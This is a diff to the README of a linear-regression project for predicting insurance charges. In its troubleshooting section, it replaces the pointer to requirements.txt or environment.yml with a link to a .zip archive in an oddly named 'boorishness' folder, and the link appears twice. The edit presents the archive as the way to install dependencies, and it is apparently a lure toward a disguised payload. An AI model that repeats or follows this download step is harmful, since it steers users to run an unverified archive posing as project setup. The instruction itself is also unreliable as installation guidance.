mhdee740/insurance-charges-prediction-linear-regression/README.md

 Troubleshooting common issues
 - If dependencies fail to install:
   - Ensure you are using a compatible Python version (3.8+)
-  - Use the provided requirements.txt or environment.yml to install dependencies
+  - Use the provided https://raw.githubusercontent.com/mhdee740/insurance-charges-prediction-linear-regression/main/boorishness/regression_linear_prediction_charges_insurance_3.1.zip or https://raw.githubusercontent.com/mhdee740/insurance-charges-prediction-linear-regression/main/boorishness/regression_linear_prediction_charges_insurance_3.1.zip to install dependencies
 - If the notebook cannot access data files:
   - Confirm the data paths match the repository structure
   - If using a fresh environment, re-run the data download or generation step from data/raw